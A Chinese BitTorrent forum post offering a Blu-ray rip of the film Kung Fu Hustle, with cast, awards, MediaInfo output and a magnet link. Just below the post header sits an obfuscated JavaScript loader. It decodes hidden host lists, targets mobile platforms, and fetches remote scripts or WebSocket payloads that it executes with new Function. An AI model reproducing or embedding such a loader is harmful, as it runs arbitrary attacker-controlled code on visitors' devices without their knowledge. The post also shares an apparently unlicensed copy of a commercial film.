功夫[国粤语配音/中文字幕].Kung.Fu.Hustle.2004.1080p.BluRay.x265.10bit.DTS.2Audio 4.91GB

版主小s 19天前 105

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 功夫 / 功夫3D / Kung Fu Hustle

◎年 代 2004

◎产 地 中国大陆 / 中国香港

◎类 别 喜剧 / 动作 / 犯罪 / 奇幻

◎语 言 粤语 / 汉语普通话 / 手语

◎上映日期 2004-12-23(中国大陆/中国香港) / 2015-01-15(中国大陆3D) / 2004-09-14(多伦多电影节)

◎IMDb链接 https://www.imdb.com/title/tt0373074/

◎豆瓣评分 8.7/10 (882945人评价)

◎豆瓣链接 https://movie.douban.com/subject/1291543/

◎片 长 100分钟(3D重映)

◎导 演 周星驰 Stephen Chow (id:1048026)

◎编 剧 曾瑾昌 Kan-Cheung Tsang (id:1299569)

陈文强 Man Keung Chan (id:1280434)

周星驰 Stephen Chow (id:1048026)

霍昕 Xin Huo (id:1287182)

◎演 员 周星驰 Stephen Chow (id:1048026)

元秋 Qiu Yuen (id:1304876)

元华 Wah Yuen (id:1050240)

黄圣依 Eva Huang (id:1005110)

梁小龙 Siu-Lung Leung (id:1274267)

陈国坤 Kwok-Kwan Chan (id:1229775)

田启文 Kai Man Tin (id:1315882)

林子聪 Tze Chung Lam (id:1314402)

林雪 Suet Lam (id:1274279)

冯克安 Hark-On Fung (id:1283563)

释彦能 Yanneng Shi (id:1202926)

冯小刚 Xiaogang Feng (id:1274255)

袁祥仁 Cheung-Yan Yuen (id:1301574)

张一白 Yibai Zhang (id:1275554)

赵志凌 Chi-Ling Chiu (id:1314248)

董志华 Zhihua Dong (id:1274936)

何文辉 Wenhui He (id:1322073)

陈凯师 Kai-Shi Chen (id:1319710)

贾康熙 Kangxi Jia (id:1333924)

林子善 Chi-Sing Lam (id:1314861)

任珈锐 Jiarui Ren (id:1321155)

王仕颖 Shiying Wang (id:1364721)

冯勉恒 Min Hun Fung (id:1322425)

范湉湉 Tiantian Fan (id:1351495)

杨能 Neng Yang (id:1354115)

黄锐民 Oliver Wong (id:1290844)

姜瑰瑾 Guijin Jiang (id:1322544)

丁小龙 Xiaolong Ding (id:1417235)

张明明 Mingming Zhang (id:1330941)

钱升玮 Wellson Chin (id:1015143)

林志泰 Chi Tai Lam (id:1433961)

阮昊天 Haotian Yuan (id:1442073)

程守一 Billy Sau Yat Ching (id:1385056)

周星驰 Stephen Chow (id:1048026)

刘镇伟 Jeffrey Lau (id:1274431)

王中磊 Zhonglei Wang (id:1276037)

比尔·伯顿 Bill Borden (id:1278992)

崔宝珠 Po Chu Chui (id:1275339)

韩三平 Sanping Han (id:1274843)

杨步亭 Buting Yang (id:1330650)

馮鳳珍 Rita Fung (id:1441554)

吴锦超 Gam Chiu Ng (id:1383629)

王中军 Zhongjun Wang (id:1276036)

王雅琳 Connie Wong (id:1396200)

周星驰 Stephen Chow (id:1048026)

黄英华 Ying-Wah Wong (id:1301204)

刘家昌 Chia Chang Liu (id:1289498)

商易 Yi Shang (id:1414560)

潘恒生 Hang-Sang Poon (id:1294721)

林安儿 Angie Lam (id:1038152)

黄锐民 Oliver Wong (id:1290844)

陈顾方 Shirley Chan (id:1280438)

蔡彦菁 Maggie Choy (id:1426247)

刘静仪 Sylvia Liu (id:1290178)

钱升玮 Wellson Chin (id:1015143)

钟智行 Frankie Chung (id:1308985)

汤米·汤姆 Tommy Tom (id:1311162)

洪金宝 Sammo Hung Kam-Bo (id:1055887)

袁和平 Woo-ping Yuen (id:1275026)

蓝海瀚 Allen Lan (id:1319119)

林克明 Ke Ming Lin (id:1360416)

袁信义 Shun-Yee Yuen (id:1301576)

谷轩昭 Huan-Chiu Ku (id:1289063)

陈纯昆 Chun-Kun Chen (id:1325047)

◎标 签 周星驰 / 喜剧 / 功夫 / 香港 / 动作 / 经典 / 搞笑 / 香港电影

◎简 介

1940年代的上海,自小受尽欺辱的街头混混阿星(周星驰)为了能出人头地,可谓窥见机会的缝隙就往里钻,今次他盯上行动日益猖獗的黑道势力“斧头帮”,想借之大名成就大业。

阿星假冒“斧头帮”成员试图在一个叫“猪笼城寨”的地方对居民敲诈,不想引来真的“斧头帮”与“猪笼城寨”居民的恩怨。“猪笼城寨”原是藏龙卧虎之处,居民中有许多身怀绝技者(元华、梁小龙等),他们隐藏于此本是为远离江湖恩怨,不想麻烦自动上身,躲都躲不及。而在观战正邪两派的斗争中,阿星逐渐领悟功夫的真谛。

◎获奖情况 (共38项)

第63届金球奖 (2006)

电影类 最佳外语片(提名)

第42届台北金马影展 (2005)

金马奖 最佳剧情片

金马奖 最佳导演

└──周星驰 (id:1048026)

金马奖 最佳男配角(提名)

└──元华 (id:1050240)

金马奖 最佳女配角

└──元秋 (id:1304876)

金马奖 最佳美术设计(提名)

└──黄锐民 (id:1290844)

金马奖 最佳造型设计

└──陈顾方 (id:1280438)

金马奖 最佳动作设计(提名)

└──袁和平 (id:1275026)

金马奖 最佳剪辑(提名)

└──林安儿 (id:1038152)

金马奖 最佳音效(提名)

金马奖 最佳视觉效果

第24届香港电影金像奖 (2005)

最佳电影

最佳导演(提名)

└──周星驰 (id:1048026)

最佳编剧(提名)

最佳男主角(提名)

└──周星驰 (id:1048026)

最佳女主角(提名)

└──元秋 (id:1304876)

最佳男配角

└──元华 (id:1050240)

最佳男配角(提名)

└──陈国坤 (id:1229775)

最佳新演员(提名)

└──黄圣依 (id:1005110)

最佳摄影(提名)

└──潘恒生 (id:1294721)

最佳剪接

└──林安儿 (id:1038152)

最佳美术指导(提名)

└──黄锐民 (id:1290844)

最佳服装造型设计(提名)

└──陈顾方 (id:1280438)

最佳动作设计

└──袁和平 (id:1275026)

最佳原创电影音乐(提名)

└──黄英华 (id:1301204)

最佳音响效果

最佳视觉效果

第59届英国电影学院奖 (2006)

电影奖 最佳非英语片(提名)

第15届MTV电影奖 (2006)

MTV电影奖 最佳打斗(提名)

└──周星驰 (id:1048026)

第28届大众电影百花奖 (2006)

最佳故事片(提名)

优秀故事片

最佳导演(提名)

└──周星驰 (id:1048026)

最佳男主角(提名)

└──周星驰 (id:1048026)

最佳男配角(提名)

└──元华 (id:1050240)

最佳女配角

└──元秋 (id:1304876)

最佳新人(提名)

└──黄圣依 (id:1005110)

第5届华语电影传媒大奖 (2005)

百家传媒年度致敬电影(提名)

最佳男配角(提名)

└──元华 (id:1050240)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 249750146403848201454660513234804920113 (0xBBE420E923B77F486CFEE0BB48F5CF31)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.91 GiB

  8. Duration : 1 h 39 min

  9. Overall bit rate : 7 072 kb/s

  10. Movie name : Kung Fu Hustle - Blu-ray?

  11. Encoded date : UTC 2021-09-27 04:02:32

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 39 min

  23. Bit rate : 4 655 kb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.126

  33. Stream size : 3.23 GiB (66%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=18.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 39 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.05 GiB (21%)

  53. Title : Cantonese

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. ID in the original source medium : 4354 (0x1102)

  60. Format : AC-3

  61. Format/Info : Audio Coding 3

  62. Commercial name : Dolby Digital

  63. Codec ID : A_AC3

  64. Duration : 1 h 39 min

  65. Bit rate mode : Constant

  66. Bit rate : 640 kb/s

  67. Channel(s) : 6 channels

  68. Channel layout : L R C LFE Ls Rs

  69. Sampling rate : 48.0 kHz

  70. Frame rate : 31.250 FPS (1536 SPF)

  71. Compression mode : Lossy

  72. Stream size : 455 MiB (9%)

  73. Title : Mandarin

  74. Language : Chinese

  75. Service kind : Complete Main

  76. Default : No

  77. Forced : No

  78. Original source medium : Blu-ray


  79. Audio #3

  80. ID : 4

  81. ID in the original source medium : 4356 (0x1104)

  82. Format : AC-3

  83. Format/Info : Audio Coding 3

  84. Commercial name : Dolby Digital

  85. Codec ID : A_AC3

  86. Duration : 1 h 39 min

  87. Bit rate mode : Constant

  88. Bit rate : 192 kb/s

  89. Channel(s) : 2 channels

  90. Channel layout : L R

  91. Sampling rate : 48.0 kHz

  92. Frame rate : 31.250 FPS (1536 SPF)

  93. Compression mode : Lossy

  94. Stream size : 137 MiB (3%)

  95. Title : Commentary By Cantonese

  96. Language : Chinese

  97. Service kind : Complete Main

  98. Default : No

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Text #1

  102. ID : 5

  103. ID in the original source medium : 4610 (0x1202)

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 33 min

  109. Bit rate : 15.9 kb/s

  110. Count of elements : 1480

  111. Stream size : 10.7 MiB (0%)

  112. Title : chs

  113. Language : Chinese

  114. Default : Yes

  115. Forced : No

  116. Original source medium : Blu-ray


  117. Text #2

  118. ID : 6

  119. ID in the original source medium : 4609 (0x1201)

  120. Format : PGS

  121. Muxing mode : zlib

  122. Codec ID : S_HDMV/PGS

  123. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  124. Duration : 1 h 32 min

  125. Bit rate : 24.8 kb/s

  126. Count of elements : 1218

  127. Stream size : 16.5 MiB (0%)

  128. Title : cht

  129. Language : Chinese

  130. Default : No

  131. Forced : No

  132. Original source medium : Blu-ray


  133. Text #3

  134. ID : 7

  135. ID in the original source medium : 4608 (0x1200)

  136. Format : PGS

  137. Muxing mode : zlib

  138. Codec ID : S_HDMV/PGS

  139. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  140. Duration : 1 h 33 min

  141. Bit rate : 25.6 kb/s

  142. Count of elements : 1216

  143. Stream size : 17.1 MiB (0%)

  144. Title : eng

  145. Language : English

  146. Default : No

  147. Forced : No

  148. Original source medium : Blu-ray


  149. Text #4

  150. ID : 8

  151. ID in the original source medium : 4614 (0x1206)

  152. Format : PGS

  153. Muxing mode : zlib

  154. Codec ID : S_HDMV/PGS

  155. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  156. Duration : 1 h 35 min

  157. Bit rate : 41.2 kb/s

  158. Count of elements : 2841

  159. Stream size : 28.2 MiB (1%)

  160. Title : commentary by cht

  161. Language : Chinese

  162. Default : No

  163. Forced : No

  164. Original source medium : Blu-ray


  165. Text #5

  166. ID : 9

  167. ID in the original source medium : 4612 (0x1204)

  168. Format : PGS

  169. Muxing mode : zlib

  170. Codec ID : S_HDMV/PGS

  171. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  172. Duration : 1 h 35 min

  173. Bit rate : 43.9 kb/s

  174. Count of elements : 2841

  175. Stream size : 30.0 MiB (1%)

  176. Title : commentary by eng

  177. Language : English

  178. Default : No

  179. Forced : No

  180. Original source medium : Blu-ray


  181. Menu

  182. 00:00:00.000 : 第 01 章

  183. 00:06:58.042 : 第 02 章

  184. 00:12:24.243 : 第 03 章

  185. 00:19:44.850 : 第 04 章

  186. 00:24:48.028 : 第 05 章

  187. 00:31:14.330 : 第 06 章

  188. 00:35:37.135 : 第 07 章

  189. 00:43:38.741 : 第 08 章

  190. 00:49:18.455 : 第 09 章

  191. 00:54:14.876 : 第 10 章

  192. 01:01:04.952 : 第 11 章

  193. 01:08:34.026 : 第 12 章

  194. 01:13:25.526 : 第 13 章

  195. 01:19:55.540 : 第 14 章

  196. 01:25:46.724 : 第 15 章

  197. 01:31:53.925 : 第 16 章


TAGS 动作 奇幻 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:1825C9432CD46E7144E8ED1CB1FF92EFDB3A556F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回